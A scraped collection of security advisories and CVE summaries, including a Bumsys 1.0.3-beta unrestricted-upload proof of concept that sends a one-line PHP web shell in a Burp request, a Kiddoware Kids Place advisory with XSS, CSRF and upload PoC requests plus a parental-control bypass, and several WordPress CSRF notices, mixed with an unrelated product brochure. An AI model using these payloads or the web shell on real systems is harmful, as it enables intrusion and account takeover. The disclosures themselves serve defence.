Cross-Site Request Forgery (CSRF) in GitHub repository tsolucio/corebos prior to 8.

CVE-2023-3075

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

Shop Beat Solutions (Pty) LTD Shop Beat Media Player 2.5.95 up to 3.2.57 is vulnerable to Cross Site Request Forgery (CSRF).

*   Our Products
*   Contact Us
*   Help
*   New Signup

  Your browser does not support the video tag.

Shop Beat offers a plug and play solution for audio and visual that can be fully customized to the specific needs of any location.

With complete control of the music, brand messages, jingles, adverts, staff training and more, Shop Beat will create the perfect atmosphere for customers and staff, whilst enhancing your brand and driving sales!

**HOW SHOP BEAT WORKS**

**Select Your Sound**

The sound of your shop comes to life with the  
largest selection of music & voice artists.

**Always Updated**

All audio and visual files are stored on our unique  
media player - No costly streaming & no downtime!

**Plug & Play**

Simply plug Shop Beat into  
your amplifier & internet for updates and you're live!

**Engage Shoppers**

Adverts and promotions  
aired where and  
when it counts.

**Make It Interactive**

Shop Beat interactive  
screens help promote your  
products and services.

**All Under Control**

Manage audio and visual  
media with our easy to  
use online control panel.

**FEATURES AND BENEFITS**

**Hyper Local**

Customise the language, music,  
adverts and more for  
your individual shops.

**Control Panel**

Manage and customise  
your in-store content  
from anywhere.

**Compact**

The Shop Beat player is ultra compact, meaning no bulky boxes and excessive wires!

**Music Selection**

We have one of the widest  
selections of music to choose from for that perfect beat.

**Messages Produced**

Our studio is ready to script,  
record and polish your very own  
messages.

**Easy Installation**

All you need is an internet  
connection, speakers and a  
working plug!

**Engaging Visuals**

Use the same media player to power your digital signage - FREE!

**Staff Training**

Use your radio station for training your staff while they are on the shop floor. Engage with your team with impactful results!

**Be On The Right Side**

Our products and services allow you to easily comply with all SAMRO and SAMPRA regulations.

**OUR DIGITAL DISPLAY PRODUCTS**

**Point of Sale**

An eye-catching display at the point of sale,  
designed to promote products and impact buying decisions.

**Digital Menu Boards**

A digital menu board enabling the easy  
management and updating of menu items, prices  
and nutritional information.

**Touch screens**

Our bright and engaging interactive touch  
screens provide maximum interest in your businesses' products and services.

**General Display Screens**

Screens can be utilised for a variety of different purposes depending on your circumstances - Including displaying individual merchandise, special offers, or even high-end, promotional video content.

**Video Wall**

Our bespoke, high-end video wall solution. Create a totally unique customer experience, showcasing your best promotions and products.

We offer a wide-range of other digital media solutions, adaptable and expandable to your needs. Simply contact us to find out more.

**A SOLUTION FOR ALL.**

Whether it's one small shop or a multinational retail chain, Shop Beat has the flexibility to meet all audio and visual requirements.

**PROFESSIONAL, REGULATED & LEGAL**

As a long-term, responsible provider of audio-visual content, all our clients are requested to comply with all applicable SAMRO and SAMPRA rules and regulations.

**THE SHOP BEAT TEAM**

Our world-class team works to provide a diverse range of customers with the most advanced audio and visual solutions for their businesses.

Our team members include leaders in broadcast, technology, marketing and creative fields.

We offer a quick turnaround time on support and requests. Our passionate team is here to serve you!

**Shop Beat South Africa, E7 Centurion Business Park, Bosmansdam Road, Milnerton, Cape Town, 7441****By using Shop Beat services & platforms, you agree to our privacy policy here ~ Download our PAIA manual here****© Copyright 2020, ShopBeat. All rights reserved.**

CVE-2022-36250: Shop Beat - Giving Your Shop A Beat

PrinterLogic build version 1.0.757 suffers from authentication bypass, cross site request forgery, cross site scripting, session fixation, insufficient checks, impersonation, remote SQL injection, and various other vulnerabilities.

PrinterLogic Build 1.0.757 XSS / SQL Injection / Authentication Bypass

The WP Fastest Cache WordPress plugin before 1.1.5 does not have CSRF check in an AJAX action, and does not validate user input before using it in the wp_remote_get() function, leading to a Blind SSRF issue

CVE-2023-1938

The Newsletter Popup WordPress plugin through 1.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks as the wp_newsletter_show_localrecord page is not protected with a nonce.

CVE-2023-0766

An issue was discovered in the Kiddoware Kids Place Parental Control application before 3.8.50 for Android. The child can remove all restrictions temporarily without the parents noticing by rebooting into Android Safe Mode and disabling the "Display over other apps" permission.

Multiple vulnerabilities have been identified in the Kiddoware Kids Place Parental Control Android App. Users of the parent's web dashboard can be attacked via cross site scripting or cross site request forgery vulnerabilities, or attackers may upload arbitrary files to the children's devices. Furthermore, children are able to bypass any restrictions without the parents noticing.

**Vendor description**

"_Kiddoware is the world’s leading parental control solutions company with a wide range of products and  serving over 5 million families worldwide. Kiddoware is committed in helping you to protect your kids while providing you intelligence to be proactive about your childs’ online activities._"

Source: https://kiddoware.com/

**Business recommendation**

The vendor provides an update for the affected version(s) which should be installed immediately.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.

The issues identified in this application were part of our blog post "The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

**Vulnerability overview/description****1) Login and registration returns password as MD5 hash**

Login and registration requests return the unsalted MD5 hash of the password. This indicates that the passwords are stored in an insecure format at the server. Furthermore, MD5 hashing should not be used anymore in modern applications.

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)**

The customizable name of the child's device can be used to trigger a XSS payload in the parent web dashboard. Children might be able to attack their parents' account.

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

All requests in the web dashboard are vulnerable to CSRF attacks. The requests contain the device Id of the child device which must be known to the attacker in order to successfully attack a child. But the device Id is not considered a secret, as it is used in the URL in some requests. An attacker could have obtained the Id through the browser history.

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents send files to the child's device. The selected file is uploaded to an AWS S3 bucket and the returned URL will be transmitted to the device which will then download it. It is possible to send arbitrary files to the child's device and thereby upload arbitrary files (size restriction ~10MB) to the AWS S3 bucket. The returned link is publicly available, so it is possible to use the server to spread malware.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can remove all restrictions temporarily without the parents noticing.

**Proof of concept****1) Login and registration returns password as MD5 hash**

The "Change password" request looks as follows:

    POST /account/change_password/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    [...]
    
    old_password=c869123c&new_password=password&confirm_password=password

The response from the web server contains the hashed, unsalted password:

    {
    	"error":null,
    	"result":
    		{
    			"email":"xxxxx@example.com",
    			"hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",
    			"message":"Password successfully changed!"
    		},
    	"status":200
    } 

Proving this is an unsalted MD5 hash:

    $ echo -n "password" | md5sum -t
    5f4dcc3b5aa765d61d8327deb882cf99  -

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) **

The device name can be changed by the child's account by sending a POST request to the API with the pushDeviceConfig method. The following payload can be used as a PoC to trigger an alert box on every page the device name is visible in the parent dashboard. Children/attackers would be able to take over their parents' accounts via this attack.

    POST /v2/api/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Content-Type: application/json; charset=utf-8
    Content-Length: 461
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.12.8
    Connection: close
    
    {
        "method":"pushDeviceConfig",
        "id":null,
        "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",
        {
            "isGPSEnabled":false,"deviceGCMRegID":"",
            "deviceUserAgeRange":3,
            "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",
            [...]
        }
    } 

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

As an example, an attacker can abuse the CSRF vulnerability to download an arbitrary file to a child's device. It is simply needed to create a form which automatically submits on page load. If a parent is logged in the web dashboard and visits  this malicious site, the authenticated request will be sent and the file specified in the URL parameter will be downloaded by the child's device.

    POST /account/push_content/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 75
    Connection: close
    
    url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket and push it to the child device.

    POST /account/push_content_file/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 296
    [...]
    
    -----------------------------27687116714103572458683268551
    Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"
    Content-Type: text/plain
    
    <eicar-file>
    -----------------------------27687116714103572458683268551--

The upload of the eicar file worked without errors and could subsequently also be downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions. 

For example, previously locked apps can now be used. To notice the problem, the parent has to check the parent's dashboard manually, a notification is not sent. If the child turns the permission back on in the meantime, the bypass will go unnoticed.

**Vulnerable / tested versions**

The following version has been tested and downloaded through Google Play store, which was the most recent version available at the time of the test:

*   3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

**Vendor contact timeline**

CVE-2023-28153: Multiple Vulnerabilities in Kiddoware Kids Place Parental Control Android App

Cross-Site Request Forgery (CSRF) vulnerability in Codeixer Product Gallery Slider for WooCommerce plugin <= 2.2.8 versions.

**Solution**

Fixed 

Update the WordPress Product Gallery Slider for WooCommerce plugin to the latest available version (at least 2.2.9).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Product Gallery Slider for WooCommerce Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.2.9.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-45372: WordPress Product Gallery Slider for WooCommerce plugin <= 2.2.8 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Custom Twitter Feeds (Tweets Widget) plugin <= 1.8.4 versions.

**Solution**

Fixed 

Update the WordPress Custom Twitter Feeds (Tweets Widget) plugin to the latest available version (at least 2.0).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Custom Twitter Feeds (Tweets Widget) Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.0.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-33974: WordPress Custom Twitter Feeds plugin <= 1.8.4 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Metagauss Download Plugin <= 2.0.4 versions.

**Solution**

Fixed 

Update the WordPress Download Plugin plugin to the latest available version (at least 2.0.5).

Found this useful? Thank Lana Codes for reporting this vulnerability. Buy a coffee ☕

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Download Plugin Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.0.5.

**Other vulnerabilities in this plugin**

 0 present

 4 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#csrf